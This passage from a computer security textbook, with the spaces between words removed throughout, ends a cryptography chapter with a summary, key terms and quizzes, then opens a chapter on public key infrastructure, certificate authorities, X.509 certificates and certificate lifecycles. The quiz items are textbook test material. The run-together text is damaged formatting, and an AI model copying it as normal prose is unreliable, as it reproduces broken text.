algorithm.Mostgoodalgorithmsareapprovedforuseonlyafteralengthytestandpublicreviewphase.
Chapter5Review
ForMoreInformationAppliedCryptography,SecondEdition,BruceSchneier(JohnWiley&Sons)
Cryptool:https://www.cryptool.org/en/
BruceSchneierBlog:https://www.schneier.com/cryptography.html
LabBookExercisesThefollowinglabexercisesfromthecompanionlabmanual,PrinciplesofComputerSecurityLabManual,FourthEdition,providepracticalapplicationofmaterialcoveredinthischapter:
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingaboutcryptography.
Understandthefundamentalsofcryptography
Understandthefundamentalmethods.
Understandhowtocomparestrengthsandperformanceofalgorithms.
Haveanappreciationofthehistoricalaspectsofcryptography.
Identifyanddescribethethreetypesofcryptography
Symmetriccryptographyisbasedupontheconceptofasharedsecretorkey.
Asymmetriccryptographyisbaseduponakeythatcanbemadeopenlyavailabletothepublic,yetstillprovidesecurity.
One-way,orhashing,cryptographytakesdataandenciphersit.However,thereisnowaytodecipheritandnokey.
Properrandomnumbergenerationisessentialforcryptographicuse,asthestrengthoftheimplementationfrequentlydependsuponitbeingtrulyrandomandunknown.
Listanddescribecurrentcryptographicalgorithms
Hashingistheuseofaone-wayfunctiontogenerateamessagesummaryfordataintegrity.
HashingalgorithmsincludeSHA(SecureHashAlgorithm)andMD(MessageDigest).
Symmetricencryptionisasharedsecretformofencryptingdataforconfidentiality;itisfastandreliable,butneedssecurekeymanagement.
SymmetricalgorithmsincludeDES(DataEncryptionStandard),3DES,AES(AdvancedEncryptionStandard),CAST,Blowfish,IDEA,andRC(RivestCipher)variants.
Asymmetricencryptionisapublic/privatekey-pairencryptionusedforauthentication,nonrepudiation,andconfidentiality.
AsymmetricalgorithmsincludeRSA,Diffie-Hellman,ElGamal,andECC.
Explainhowcryptographyisappliedforsecurity
Confidentialityisgainedbecauseencryptionisverygoodatscramblinginformationtomakeitlooklikerandomnoise,wheninfactakeycandecipherthemessageandreturnittoitsoriginalstate.
Integrityisgainedbecausehashingalgorithmsarespecificallydesignedtocheckintegrity.Theycanreduceamessagetoamathematicalvaluethatcanbeindependentlycalculated,guaranteeingthatanymessagealterationwouldchangethemathematicalvalue.
Nonrepudiationisthepropertyofnotbeingabletoclaimthatyoudidnotsendthedata.Thispropertyisgainedbecauseofthepropertiesofprivatekeys.
Authentication,orbeingabletoproveyouareyou,isachievedthroughtheprivatekeysinvolvedindigitalsignatures.
Theuseofkeygenerationmethodsincludingephemeralkeysandkeystretchingareimportanttoolsintheimplementationofstrongcryptosystems.
Digitalsignatures,combiningmultipletypesofencryption,provideanauthenticationmethodverifiedbyathirdparty,allowingyoutousethemasifyouwereactuallysigningthedocumentwithyourregularsignature.
Digitalrightsmanagement(DRM)usessomeformofasymmetricencryptionthatallowsanapplicationtodetermineifyouareanauthorizeduserofthedigitalcontentyouaretryingtoaccess.Forexample,thingslikeDVDsandcertaindigitalmusicformatssuchasAACSuseDRM.
Theprincipleofperfectforwardsecrecyprotectsfuturemessagesfrompreviousmessagekeydisclosures.
Provencryptographictechnologiesareimportantasmostcryptographicsystemsfailandonlyafewstandthetestoftime.Homebrewsystemsareripeforfailure.
Ciphersuitesprovideinformationtoassistdevelopersinchoosingthecorrectmethodstoachievedesiredlevelsofprotection.
KeyTermsalgorithm(96)blockcipher(104)ciphertext(94)collisionattack(99)confusion(120)cryptanalysis(90)cryptography(90)differentialcryptanalysis(91)diffusion(120)digitalrightsmanagement(121)digitalsignature(120)entropy(98)ephemeralkeys(119)eXclusiveOR(XOR)(97)hash(99)key(97)keyescrow(118)keymanagement(98)keyspace(93)keystretching(119)linearcryptanalysis(91)multipleencryption(104)perfectforwardsecrecy(120)plaintext(94)sharedsecret(103)shiftcipher(94)
steganography(114)streamcipher(107)substitution(92)transposition(92)transpositioncipher(93)trapdoorfunction(109)Vigenèrecipher(95)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.Makingtwoinputsresultintheexactsamecryptographichashiscalleda(n)_______________.
2.Asimplewaytohideinformation,the_______________movesaletterasetnumberofplacesdownthealphabet.
3.Toprovideforperfectforwardsecurity,oneshoulduse_______________.
4._______________isrequiredforsymmetricencryption.5._______________istheevaluationofacryptosystemtotestits
security.
6._______________referstoeverypossiblevalueforacryptographickey.
7._______________isthefunctionmostcommonlyseenincryptography,a“bitwiseexclusive”or.
8.Themeasureofrandomnessinadatastreamiscalled_______________.
9.Processingthroughanalgorithmmorethanoncewithdifferentkeys
iscalled_______________.
10.Thebasisforsymmetriccryptographyistheprincipleofa(n)_______________.
Multiple-ChoiceQuiz1.Whenamessageissent,nomatterwhatitsformat,whydowecare
aboutitsintegrity?
A.Toensureproperformatting
B.Toshowthattheencryptionkeysareundamaged
C.Toshowthatthemessagehasnotbeeneditedintransit
D.Toshowthatnoonehasviewedthemessage
2.Howis3DESdifferentfrommanyothertypesofencryptiondescribedinthischapter?
A.Itonlyencryptsthehash.
B.Ithashesthemessagebeforeencryption.
C.Itusesthreekeysandmultipleencryptionand/ordecryptionsets.
D.Itcandisplaythekeypublicly.
3.Ifamessagehasahash,howdoesthehashprotectthemessageintransit?
A.Ifthemessageisedited,thehashwillnolongermatch.
B.Hashingdestroysthemessagesothatitcannotbereadbyanyone.
C.Hashingencryptsthemessagesothatonlytheprivatekeyholdercanreadit.
D.Thehashmakesthemessageuneditable.
4.Whatisthebiggestdrawbacktosymmetricencryption?A.Itistooeasilybroken.
B.Itistooslowtobeeasilyusedonmobiledevices.
C.Itrequiresakeytobesecurelyshared.
D.ItisavailableonlyonUNIX.
5.WhatisDiffie-Hellmanmostcommonlyusedfor?A.Symmetricencryptionkeyexchange
B.Signingdigitalcontracts
C.Securee-mail
D.Storingencryptedpasswords
6.Whatispublickeycryptographyamorecommonnamefor?A.Asymmetricencryption
B.SHA
C.Symmetricencryption
D.Hashing
7.Whatalgorithmcanbeusedtoprovideforkeystretching?A.PBKDF2
B.SHA356
C.RIPEMD
D.3DES
8.Agoodhashfunctionisresistanttowhat?
A.Brute-forcing
B.Rainbowtables
C.Interception
D.Collisions
9.Howis3DESanimprovementovernormalDES?A.Itusespublicandprivatekeys.
B.Ithashesthemessagebeforeencryption.
C.Itusesthreekeysandmultipleencryptionand/ordecryptionsets.
D.ItisfasterthanDES.
10.Whatisthebestkindofkeytohave?A.Easytoremember
B.Longandrandom
C.Longandpredictable
D.Short
EssayQuiz1.Describehowpolyalphabeticsubstitutionworks.2.Explainwhyasymmetricencryptioniscalledpublickeyencryption.3.Describecryptanalysis.
LabProjects
•LabProject5.1Usingautilityprogram,demonstratehowsinglecharacterchangescanmakesubstantialchangestohashvalues.
•LabProject5.2Createakeysetanduseittotransferafilesecurely.
chapter6 PublicKeyInfrastructure
Withouttrust,thereisnothing.
—ANONYMOUS
P
Inthischapter,youwilllearnhowto
Implementthebasicsofpublickeyinfrastructures
Describetheroleofregistrationauthorities
Usedigitalcertificates
Understandthelifecycleofcertificates
Explaintherelationshipbetweentrustandcertificateverification
Describetherolesofcertificateauthoritiesandcertificaterepositories
Identifycentralizedanddecentralizedinfrastructures
Describepublicandin-housecertificateauthorities
ublickeyinfrastructures(PKIs)arebecomingacentralsecurityfoundationformanagingidentitycredentialsinmanycompanies.Thetechnologymanagestheissueofbindingpublickeysandidentities
acrossmultipleapplications.Theotherapproach,withoutPKIs,istoimplementmanydifferentsecuritysolutionsandhopeforinteroperabilityandequallevelsofprotection.PKIscompriseseveralcomponents,includingcertificates,registration
andcertificateauthorities,andastandardprocessforverification.PKIsareaboutmanagingthesharingoftrustandusingathirdpartytovouchforthetrustworthinessofaclaimofownershipoveracredentialdocument,calledacertificate.
TheBasicsofPublicKeyInfrastructuresApublickeyinfrastructure(PKI)providesallthecomponentsnecessaryfordifferenttypesofusersandentitiestobeabletocommunicatesecurelyandinapredictablemanner.APKIismadeupofhardware,applications,policies,services,programminginterfaces,cryptographicalgorithms,protocols,users,andutilities.Thesecomponentsworktogethertoallow
communicationtotakeplaceusingpublickeycryptographyandsymmetrickeysfordigitalsignatures,dataencryption,andintegrity.
CrossCheckPKIsandEncryptionThetechnologiesusedinPKIincludemanycryptographicalgorithmsandmechanisms.EncryptiontechnologiesandpublickeyprincipleswerecoveredinChapter5.Abasicunderstandingofpublicandprivatekeysandtheirrelationshiptopublickeyencryptionisaprerequisiteforthischapter.Ifneeded,reviewthatmaterialbeforeyouattemptthedetailsofPKIinthischapter.
Althoughmanydifferentapplicationsandprotocolscanprovidethesametypeoffunctionality,constructingandimplementingaPKIboilsdowntoestablishingaleveloftrust.If,forexample,JohnandDianewanttocommunicatesecurely,Johncangeneratehisownpublic/privatekeypairandsendhispublickeytoDiane,orhecanplacehispublickeyinadirectorythatisavailabletoeveryone.IfDianereceivesJohn’spublickey,eitherfromhimorfromapublicdirectory,howdoessheknowthekeyreallycamefromJohn?Maybeanotherindividual,Katie,ismasqueradingasJohnandhasreplacedJohn’spublickeywithherown,asshowninFigure6.1(referredtoasaman-in-the-middleattack).Ifthistookplace,DianewouldbelievethathermessagescouldbereadonlybyJohnandthatthereplieswereactuallyfromhim.However,shewouldactuallybecommunicatingwithKatie.Whatisneededisawaytoverifyanindividual’sidentity,toensurethataperson’spublickeyisboundtotheiridentityandthusensurethatthepreviousscenario(andothers)cannottakeplace.
•Figure6.1WithoutPKIs,individualscouldspoofothers’identities.
InPKIenvironments,entitiescalledregistrationauthorities(RAs)andcertificateauthorities(CAs)provideservicessimilartothoseoftheDepartmentofMotorVehicles(DMV).WhenJohngoestoregisterforadriver’slicense,hehastoprovehisidentitytotheDMVbyprovidinghispassport,birthcertificate,orotheridentificationdocumentation.IftheDMVissatisfiedwiththeproofJohnprovides(andJohnpassesadrivingtest),theDMVwillcreateadriver’slicensethatcanthenbeusedbyJohntoprovehisidentity.WheneverJohnneedstoidentifyhimself,hecanshowhisdriver’slicense.AlthoughmanypeoplemaynottrustJohntoidentifyhimselftruthfully,theydotrustthethirdparty,theDMV.InthePKIcontext,whilesomevariationsexistinspecificproducts,the
RAwillrequireproofofidentityfromtheindividualrequestingacertificateandwillvalidatethisinformation.TheRAwillthenadvisetheCAtogenerateacertificate,whichisanalogoustoadriver’slicense.TheCAwilldigitallysignthecertificateusingitsprivatekey.TheuseoftheprivatekeyensurestotherecipientthatthecertificatecamefromtheCA.WhenDianereceivesJohn’scertificateandverifiesthatitwasactuallydigitallysignedbyaCAthatshetrusts,shewillbelievethatthecertificateisactuallyJohn’s—notbecauseshetrustsJohn,butbecauseshetruststheentitythatisvouchingforhisidentity(theCA).
TechTip
PublicandPrivateKeysRecallfromChapter5thatthepublickeyistheonethatyougivetoothersandtheprivatekeyneverleavesyourpossession.Anythingonekeydoes,theotherundoes,soifyouencryptsomethingwiththepublickey,onlytheholderoftheprivatekeycandecryptit.Ifyouencryptsomethingwiththeprivatekey,theneveryonewhousesthepublickeyknowsthattheholderoftheprivatekeydidtheencryption.Certificatesdonotalteranyofthis;theyonlyofferastandardmeansoftransferringkeys.
Thisiscommonlyreferredtoasathird-partytrustmodel.Publickeysarecomponentsofdigitalcertificates,sowhenDianeverifiestheCA’sdigitalsignature,thisverifiesthatthecertificateistrulyJohn’sandthatthepublickeythecertificatecontainsisalsoJohn’s.ThisishowJohn’sidentityisboundtohispublickey.ThisprocessallowsJohntoauthenticatehimselftoDianeandothers.
Usingthethird-partycertificate,JohncancommunicatewithDiane,usingpublickeyencryption,withoutpriorcommunicationorapreexistingrelationship.OnceDianeisconvincedofthelegitimacyofJohn’spublickey,shecan
useittoencryptmessagesbetweenherselfandJohn,asillustratedinFigure6.2.
•Figure6.2Publickeysarecomponentsofdigitalcertificates.
Numerousapplicationsandprotocolscangeneratepublic/privatekeypairsandprovidefunctionalitysimilartowhataPKIprovides,butnotrustedthirdpartyisavailableforbothofthecommunicatingparties.Foreachpartytochoosetocommunicatethiswaywithoutathirdpartyvouchingfortheother’sidentity,thetwomustchoosetotrusteachother
andthecommunicationchanneltheyareusing.Inmanysituations,itisimpracticalanddangeroustoarbitrarilytrustanindividualyoudonotknow,andthisiswhenthecomponentsofaPKImustfallintoplace—toprovidethenecessaryleveloftrustyoucannot,orchoosenotto,provideonyourown.
ExamTip:PKIsarecomposedofseveralelements:
•Certificates(containingkeys)
•Certificateauthorities(CAs)•Registrationauthorities(RAs)•Certificaterevocationlists(CRLs)•Trustmodels
Whatdoesthe“infrastructure”in“publickeyinfrastructure”reallymean?Aninfrastructureprovidesasustaininggroundworkuponwhichotherthingscanbebuilt.Soaninfrastructureworksatalowleveltoprovideapredictableanduniformenvironmentthatallowsother,higher-leveltechnologiestoworktogetherthroughuniformaccesspoints.Theenvironmentthattheinfrastructureprovidesallowsthesehigher-levelapplicationstocommunicatewitheachotherandgivesthemtheunderlyingtoolstocarryouttheirtasks.
CertificateAuthoritiesAcertificateauthority(CA)isatrustedauthoritythatcertifiesindividuals’identitiesandcreateselectronicdocumentsindicatingthatindividualsarewhotheysaytheyare.Theelectronicdocumentisreferredtoasadigitalcertificate,anditestablishesanassociationbetweenthesubject’sidentityandapublickey.Theprivatekeythatispairedwiththepublickeyinthecertificateisstoredseparately.
AsnotedinChapter5,itisimportanttosafeguardtheprivatekey.Typically,itshouldneverleavethemachineordevicewhereitwascreated.
ACAismorethanjustapieceofsoftware,however;itisactuallymadeupofthesoftware,hardware,procedures,policies,andpeoplewhoareinvolvedinvalidatingindividuals’identitiesandgeneratingthecertificates.Thismeansthatifoneofthesecomponentsiscompromised,itcannegativelyaffecttheCAoverallandcanthreatentheintegrityofthecertificatesitproduces.
CrossCheckCertificatesStoredonaClientPCCertificatesarestoredonuserPCs.Chapter17coverstheuseoftheInternetandassociatedmaterials,includingtheuseofcertificatesbywebbrowsers.TakeamomenttoexplorethecertificatesstoredonyourPCbyyourbrowser.Tounderstandthedetailsbehindhowcertificatesarestoredandmanaged,thereaderisdirectedtothedetailsinChapter17.
EveryCAshouldhaveacertificationpracticesstatement(CPS)thatoutlineshowidentitiesareverified;thestepstheCAfollowstogenerate,maintain,andtransmitcertificates;andwhytheCAcanbetrustedtofulfillitsresponsibilities.TheCPSdescribeshowkeysaresecured,whatdataisplacedwithina
digitalcertificate,andhowrevocationswillbehandled.IfacompanyisgoingtouseanddependonapublicCA,thecompany’ssecurityofficers,administrators,andlegaldepartmentshouldreviewtheCA’sentireCPStoensurethatitwillproperlymeetthecompany’sneeds,andtomakesurethatthelevelofsecurityclaimedbytheCAishighenoughfortheiruseandenvironment.AcriticalaspectofaPKIisthetrustbetweentheusersandtheCA,sotheCPSshouldbereviewedandunderstoodtoensurethat
thisleveloftrustiswarranted.Thecertificateserveristheactualservicethatissuescertificatesbased
onthedataprovidedduringtheinitialregistrationprocess.Theserverconstructsandpopulatesthedigitalcertificatewiththenecessaryinformationandcombinestheuser’spublickeywiththeresultingcertificate.ThecertificateisthendigitallysignedwiththeCA’sprivatekey.
TechTip
TrustingCAsThequestionofwhetheraCAcanbetrustedispartofthecontinuingdebateonhowmuchsecurityPKIsactuallyprovide.Overall,peopleputalotoffaithinCAs.ThecompaniesthatprovideCAservicesunderstandthisandalsounderstandthattheirbusinessisbasedontheirreputation.IfaCAwascompromisedordidnotfollowthroughonitsvariousresponsibilities,wordwouldgetoutanditwouldquicklylosecustomersandbusiness.CAsworkdiligentlytoensurethatthereputationoftheirproductsandservicesremainsgoodbyimplementingverysecurefacilities,methods,procedures,andpersonnel.Butitisuptothecompanyorindividualtodeterminewhatdegreeoftrustcanactuallybegivenandwhatlevelofriskisacceptable.
RegistrationAuthoritiesAregistrationauthority(RA)isthePKIcomponentthatacceptsarequestforadigitalcertificateandperformsthenecessarystepsofregisteringandauthenticatingthepersonrequestingthecertificate.Theauthenticationrequirementsdifferdependingonthetypeofcertificatebeingrequested.MostCAsofferaseriesofclassesofcertificateswithincreasingtrustbyclass.ThespecificclassesaredescribedintheupcomingTechTipsidebar,“CertificateClasses.”Eachhigherclassofcertificatecancarryoutmorepowerfulandcritical
tasksthantheonebelowit.Thisiswhythedifferentclasseshavedifferentrequirementsforproofofidentity.IfyouwanttoreceiveaClass1
certificate,youmayonlybeaskedtoprovideyourname,e-mailaddress,andphysicaladdress.ForaClass2certification,youmayneedtoprovidetheRAwithmoredata,suchasyourdriver’slicense,passport,andcompanyinformation,thatcanbeverified.ToobtainaClass3certificate,youwillbeaskedtoprovideevenmoreinformationandmostlikelywillneedtogototheRA’sofficeforaface-to-facemeeting.EachCAwilloutlinethecertificationclassesitprovidesandtheidentificationrequirementsthatmustbemettoacquireeachtypeofcertificate.
TechTip
CertificateClassesThetypesofcertificatesavailablecanvarybetweendifferentCAs,butusuallyatleastthreedifferenttypesareavailable,andtheyarereferredtoasclasses:
Class1AClass1certificateisusuallyusedtoverifyanindividual’sidentitythroughe-mail.ApersonwhoreceivesaClass1certificatecanusehispublic/privatekeypairtodigitallysigne-mailandencryptmessagecontents.
Class2AClass2certificatecanbeusedforsoftwaresigning.Asoftwarevendorwouldregisterforthistypeofcertificatesothatitcoulddigitallysignitssoftware.Thisprovidesintegrityforthesoftwareafteritisdevelopedandreleased,anditallowsthereceiverofthesoftwaretoverifyfromwherethesoftwareactuallycame.
Class3AClass3certificatecanbeusedbyacompanytosetupitsownCA,whichwillallowittocarryoutitsownidentificationverificationandgeneratecertificatesinternally.
Inmostsituations,whenauserrequestsaClass1certificate,theregistrationprocesswillrequiretheusertoenterspecificinformationintoaweb-basedform.Thewebpagewillhaveasectionthatacceptstheuser’spublickey,oritwillsteptheuserthroughcreatingapublic/privatekeypair,whichwillallowtheusertochoosethesizeofthekeystobecreated.Oncethesestepshavebeencompleted,thepublickeyisattachedtothecertificateregistrationformandbothareforwardedtotheRAforprocessing.TheRAisresponsibleonlyfortheregistrationprocessandcannotactuallygenerateacertificate.OncetheRAisfinishedprocessing
therequestandverifyingtheindividual’sidentity,theRAsendstherequesttotheCA.TheCAusestheRA-providedinformationtogenerateadigitalcertificate,integratesthenecessarydataintothecertificatefields(useridentificationinformation,publickey,validitydates,properuseforthekeyandcertificate,andsoon),andsendsacopyofthecertificatetotheuser.ThesestepsareshowninFigure6.3.Thecertificatemayalsobepostedtoapubliclyaccessibledirectorysothatotherscanaccessit.
•Figure6.3Stepsforobtainingadigitalcertificate
Notethata1:1correspondencedoesnotnecessarilyexistbetweenidentitiesandcertificates.Anentitycanhavemultiplekeypairs,usingseparatepublickeysforseparatepurposes.Thus,anentitycanhavemultiplecertificates,eachattestingtoseparatepublickeyownership.Itisalsopossibletohavedifferentclassesofcertificates,againwithdifferentkeys.Thisflexibilityallowsentitiestotaldiscretioninhowtheymanagetheirkeys,andthePKImanagesthecomplexitybyusingaunifiedprocessthatallowskeyverificationthroughacommoninterface.Ifanapplicationcreatesakeystorethatcanbeaccessedbyother
applications,itwillprovideastandardizedinterface,calledtheapplicationprogramminginterface(API).Asanexample,Figure6.4showsthatapplicationAwentthroughtheprocessofregisteringacertificateandgeneratingakeypair.Itcreatedakeystorethatprovidesaninterfacetoallowotherapplicationstocommunicatewithitandusetheitemsheldwithinthestore.Thelocalkeystoreisjustonelocationwheretheseitemscanbeheld.
Oftenthedigitalcertificateandpublickeyarealsostoredinacertificaterepository(asdiscussedinthe“CertificateRepositories”sectionofthischapter)sothatitisavailabletoasubsetofindividuals.
•Figure6.4Somekeystorescanbesharedbydifferentapplications.
ExamTip:TheRAverifiestheidentityofthecertificaterequestoronbehalfoftheCA.TheCAgeneratesthecertificateusinginformationforwardedbytheRA.
LocalRegistrationAuthoritiesAlocalregistrationauthority(LRA)performsthesamefunctionsasan
RA,buttheLRAisclosertotheendusers.ThiscomponentisusuallyimplementedincompaniesthathavetheirowninternalPKIsandhavedistributedsites.EachsitehasusersthatneedRAservices,soinsteadofrequiringthemtocommunicatewithonecentralRA,eachsitecanhaveitsownLRA.Thisreducestheamountoftrafficthatwouldbecreatedbyseveralusersmakingrequestsacrosswideareanetwork(WAN)lines.TheLRAperformsidentification,verification,andregistrationfunctions.Itthensendstherequest,alongwiththeuser’spublickey,toacentralizedCAsothatthecertificatecanbegenerated.ItactsasaninterfacebetweentheusersandtheCA.LRAssimplifytheRA/CAprocessforentitiesthatdesirecertificatesonlyforin-houseuse.
TechTip
SharingKeyStoresDifferentapplicationsfromthesamevendormaysharekeystores.MicrosoftapplicationskeepuserkeysandcertificatesinaRegistryentrywithinthatuser’sprofile.Theapplicationscanthensaveandretrievethemfromthissinglelocationorkeystore.OtherapplicationscouldalsousethesamekeysiftheyknewwheretheywerestoredbyusingRegistryAPIcalls.
DigitalCertificatesAdigitalcertificatebindsanindividual’sidentitytoapublickey,anditcontainsalltheinformationareceiverneedstobeassuredoftheidentityofthepublickeyowner.AfteranRAverifiesanindividual’sidentity,theCAgeneratesthedigitalcertificate,buthowdoestheCAknowwhattypeofdatatoinsertintothecertificate?ThecertificatesarecreatedandformattedbasedontheX.509standard,
whichoutlinesthenecessaryfieldsofacertificateandthepossiblevaluesthatcanbeinsertedintothefields.Asofthiswriting,X.509version3isthemostcurrentversionofthestandard.X.509isastandardoftheInternationalTelecommunicationUnion(www.itu.int).TheIETF’sPublic
KeyInfrastructure(X.509),orPKIX,workinggrouphasadaptedtheX.509standardtothemoreflexibleorganizationoftheInternet,asspecifiedinRFC5280,andiscommonlyreferredtoasPKIXforPublicKeyInfrastructureX.509.Table6.1listsanddescribesthefieldsinanX.509certificate.
Table6.1 X.509CertificateFields
Figure6.5showstheactualvaluesofthedifferentcertificatefieldsforaparticularcertificateinInternetExplorer.TheversionofthiscertificateisV3(X.509v3)andtheserialnumberisalsolisted—thisnumberisuniqueforeachcertificatethatiscreatedbyaspecificCA.TheCAusedtheMD5hashingalgorithmtocreatethemessagedigestvalueandthensigneditusingtheCA’sprivatekeyusingtheRSAalgorithm.TheactualCAthatissuedthecertificateisRootSGCAuthority,andthevaliddatesindicatehowlongthiscertificateisvalid.ThesubjectisMSSGCAuthority,whichistheentitythatregisteredthiscertificateandthatisboundtotheembeddedpublickey.Theactualpublickeyisshowninthelowerwindowandisrepresentedinhexadecimal.
•Figure6.5Fieldswithinadigitalcertificate
Thesubjectofacertificateiscommonlyaperson,butitdoesnothavetobe.Thesubjectcanalsobeanetworkdevice(router,webserver,firewall,andsoon),anapplication,adepartment,oracompany.Eachhasitsownidentitythatneedstobeverifiedandproventoanotherentitybeforesecure,trustedcommunicationcanbeinitiated.Ifanetworkdeviceisusingacertificateforauthentication,thecertificatemaycontaintheidentityofthatdevice.Thisallowsauserofthedevicetoverifyitsauthenticitybasedonthesignedcertificateandtrustinthesigningauthority.Thistrustcanbetransferredtotheidentityofthedeviceindicatingauthenticity.
TechTip
X.509DigitalCertificateExtensionsFollowingaresomekeyexamplesofcertificateextensions:
DigitalSignatureThekeyusedtoverifyadigitalsignature
KeyEnciphermentThekeyusedtoencryptotherkeysusedforsecurekeydistribution
DataEnciphermentThekeyusedtoencryptdata,whichcannotbeusedtoencryptotherkeys
CRLSignThekeyusedtoverifyaCAsignatureonaCRL
KeyCertSignThekeyusedtoverifyCAsignaturesoncertificates
NonRepudiationThekeyusedwhenanonrepudiationserviceisbeingprovided
CertificateExtensionsCertificateextensionsallowforfurtherinformationtobeinsertedwithinthecertificate,whichcanbeusedtoprovidemorefunctionalityinaPKIimplementation.Certificateextensionscanbestandardorprivate.StandardcertificateextensionsareimplementedforeveryPKI
implementation.Privatecertificateextensionsaredefinedforspecificorganizations(ordomainswithinoneorganization),andtheyallowcompaniestofurtherdefinedifferent,specificusesfordigitalcertificatestobestfittheirbusinessneeds.Severaldifferentextensionscanbeimplemented,onebeingkeyusage
extensions,whichdictatehowthepublickeythatisheldwithinthecertificatecanbeused.Rememberthatpublickeyscanbeusedfordifferentfunctions:symmetrickeyencryption,dataencryption,verifyingdigitalsignatures,andmore.Anonrepudiationservicecanbeprovidedbyathird-partynotary.Inthis
situation,thesender’sdigitalsignatureisverifiedandthensignedbythenotarysothatthesendercannotlaterdenysigningandsendingthemessage.Thisisbasicallythesamefunctionperformedbyatraditionalnotaryusingpaper—validatethesender’sidentityandvalidatethetimeanddateofanitembeingsignedandsent.Thisisrequiredwhenthereceiverneedstobereallysureofthesender’sidentityandwantstobelegallyprotectedagainstpossiblefraudorforgery.Ifacompanyneedstobesurethataccountablenonrepudiationservices
willbeprovided,atrustedtimesourceneedstobeused,whichcanbeatrustedthirdpartycalledatimestampauthority(TSA).Usingatrustedtimesourcegivesusersahigherlevelofconfidenceastowhenspecificmessagesweredigitallysigned.Forexample,supposeBarrysendsRonamessageanddigitallysignsit,andRonlatercivillysuesBarryoveradispute.ThisdigitallysignedmessagemaybesubmittedbyRonasevidencepertainingtoanearlieragreementthatBarrynowisnotfulfilling.IfatrustedtimesourcewasnotusedintheirPKIenvironment,Barrycouldclaimthathisprivatekeyhadbeencompromisedbeforethatmessagewassent.Ifatrustedtimesourcewasimplemented,thenitcouldbeshownthatthemessagewassignedbeforethedateonwhichBarryclaimshiskeywascompromised.Ifatrustedtimesourceisnotused,noactivitythatwascarriedoutwithinaPKIenvironmentcanbetrulyprovenbecauseitissoeasytochangesystemandsoftwaretimesettings.
TechTip
CriticalFlagandCertificateUsageWhenanextensionismarkedascritical,itmeansthattheCAiscertifyingthekeyforonlythatspecificpurpose.IfJoereceivesacertificatewithaDigitalSignaturekeyusageextensionandthecriticalflagisset,Joecanusethepublickeyonlywithinthatcertificatetovalidatedigitalsignatures,andnomore.Iftheextensionwasmarkedasnoncritical,thekeycanbeusedforpurposesoutsideofthoselistedintheextensions,sointhiscaseitisuptoJoe(andhisapplications)todecidehowthekeywillbeused.
CriticalandNoncriticalExtensionsCertificateextensionsareconsideredeithercriticalornoncritical,whichisindicatedbyaspecificflagwithinthecertificateitself.Whenthisflagissettocritical,itmeansthattheextensionmustbeunderstoodandprocessedbythereceiver.Ifthereceiverisnotconfiguredtounderstandaparticularextensionmarkedascritical,andthuscannotprocessitproperly,thecertificatecannotbeusedforitsproposedpurpose.Iftheflagdoesnotindicatethattheextensioniscritical,thecertificatecanbeusedfortheintendedpurpose,evenifthereceiverdoesnotprocesstheappendedextension.
CertificateAttributesFourmaintypesofcertificatesareused:
End-entitycertificates
CAcertificates
Cross-certificationcertificates
Policycertificates
End-entitycertificatesareissuedbyaCAtoaspecificsubject,suchas
Joyce,theAccountingdepartment,orafirewall,asillustratedinFigure6.6.Anend-entitycertificateistheidentitydocumentprovidedbyPKIimplementations.
•Figure6.6End-entityandCAcertificates
ACAcertificatecanbeself-signed,inthecaseofastandaloneorrootCA,oritcanbeissuedbyasuperiorCAwithinahierarchicalmodel.InthemodelinFigure6.6,thesuperiorCAgivestheauthorityandallowsthesubordinateCAtoacceptcertificaterequestsandgeneratetheindividualcertificatesitself.ThismaybenecessarywhenacompanyneedstohavemultipleinternalCAs,anddifferentdepartmentswithinanorganizationneedtohavetheirownCAsservicingtheirspecificend-entitiesintheirsections.Inthesesituations,arepresentativefromeachdepartmentrequiringaCAregisterswiththehighertrustedCAandrequestsaCertificateAuthoritycertificate.(PublicandprivateCAsarediscussedinthe“PublicCertificateAuthorities”and“In-HouseCertificateAuthorities”sectionslaterinthischapter,asarethedifferenttrustmodelsthatareavailableforcompanies.)Across-certificationcertificate,orcross-certificate,isusedwhen
independentCAsestablishpeer-to-peertrustrelationships.Simplyput,cross-certificatesareamechanismthroughwhichoneCAcanissueacertificateallowingitsuserstotrustanotherCA.WithinsophisticatedCAsusedforhigh-securityapplications,a
mechanismisrequiredtoprovidecentrallycontrolledpolicyinformationtoPKIclients.Thisisoftendonebyplacingthepolicyinformationinapolicycertificate.
CertificateLifecyclesKeysandcertificatesshouldhavelifetimesettingsthatforcetheusertoregisterforanewcertificateafteracertainamountoftime.Determiningtheproperlengthoftheselifetimesisatrade-off:shorterlifetimeslimittheabilityofattackerstocrackthem,butlongerlifetimeslowersystemoverhead.More-sophisticatedPKIimplementationsperformautomatedandoftentransparentkeyupdatestoavoidthetimeandexpenseofhavingusersregisterfornewcertificateswhenoldonesexpire.
Thismeansthatthecertificateandkeypairhasalifecyclethatmustbemanaged.Certificatemanagementinvolvesadministratingandmanagingeachofthesephases,includingregistration,certificateandkeygeneration,renewal,andrevocation.AdditionalmanagementfunctionsincludeCRLdistribution,certificatesuspension,andkeydestruction.
Settingcertificatelifetimeswayintothefutureandusingthemforlongperiodsoftimeprovidesattackerswithextendedwindowstoattackthecryptography.AsstatedinChapter5,cryptographymerelybuystimeagainstanattacker;itisneveranabsoluteguarantee.
RegistrationandGenerationAkeypair(publicandprivatekeys)canbegeneratedlocallybyanapplicationandstoredinalocalkeystoreontheuser’sworkstation.Thekeypaircanalsobecreatedbyacentralkey-generationserver,whichwillrequiresecuretransmissionofthekeystotheuser.Thekeypairthatiscreatedonthecentralizedservercanbestoredontheuser’sworkstationorontheuser’ssmartcard,whichwillallowformoreflexibilityandmobility.Theactofverifyingthatanindividualindeedhasthecorresponding
privatekeyforagivenpublickeyisreferredtoasproofofpossession.Notallpublic/privatekeypairscanbeusedfordigitalsignatures,soaskingtheindividualtosignamessageandreturnittoprovethatshehasthenecessaryprivatekeywillnotalwayswork.Ifakeypairisusedforencryption,theRAcansendachallengevaluetotheindividual,who,inturn,canuseherprivatekeytoencryptthatvalueandreturnittotheRA.IftheRAcansuccessfullydecryptthisvaluewiththepublickeythatwasprovidedearlier,theRAcanbeconfidentthattheindividualhasthenecessaryprivatekeyandcancontinuethroughtherestoftheregistrationphase.
